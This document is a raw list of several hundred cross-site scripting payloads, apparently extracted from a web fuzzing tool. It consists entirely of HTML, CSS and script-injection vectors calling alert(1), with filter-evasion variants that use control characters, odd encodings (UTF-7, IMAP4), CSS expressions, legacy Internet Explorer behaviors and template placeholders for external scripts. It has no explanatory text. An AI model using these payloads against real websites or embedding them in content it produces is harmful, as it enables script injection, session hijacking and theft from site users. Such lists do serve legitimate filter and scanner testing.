<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset
onScroll>
<script onReadyStateChange script
onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body
onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body
onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound
onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html
onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html
onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe
onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style
onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset
onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html
onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html
onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body
onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html
onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee
onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml
onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet
onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body
onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html
onMouseMove>
<applet onreadystatechange applet
onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html
onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object
onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body
onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe
onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html
onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><
br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br>
<br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test
onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction
actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div
style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden
onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/.
/,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=javascript:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)"
style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-
source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo ;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/
foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{}
</style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHI
AdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/
script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)`
attributename=`innerhtml`
to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)
attributename=innerhtml
values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%
(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute
href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0
to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);"
folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss"
datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-
event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t"
implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image:
url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML
ID="xss"><I><B><IMG SRC="javas<!--
-->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
